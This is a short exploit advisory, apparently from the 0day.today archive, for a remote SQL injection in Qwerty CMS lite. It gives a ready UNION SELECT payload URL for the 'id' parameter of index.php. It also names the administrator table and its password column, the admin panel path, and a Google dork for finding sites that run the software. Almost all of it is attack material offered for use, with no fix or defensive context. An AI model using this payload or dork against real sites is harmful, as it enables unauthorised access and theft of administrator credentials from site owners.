id: 4882
date: 02/24/2009
title: Qwerty CMS (id) Remote SQL Injection Vulnerability
author: b3
cves: 

==================================================
Qwerty CMS (id) Remote SQL Injection Vulnerability
==================================================


QWERTY CMS lite - SQL INJ
=
Injection in index.php variable: id
http://[site]/index.php?act=publ&id=-3+UNION+SELECT+1,2,3,4,5
=
Administrator Table: rkh8t5po
Columns: secret873ktlW,pass459khyf
Column with pass: pass459khyf
Admin CP: /admin/admin.php
=
CMS PAGE : http://web-sites.kiev.ua
GOOGLE DORK : allinurl:index.php?act=publ



#  0day.today [2023-03-24]  #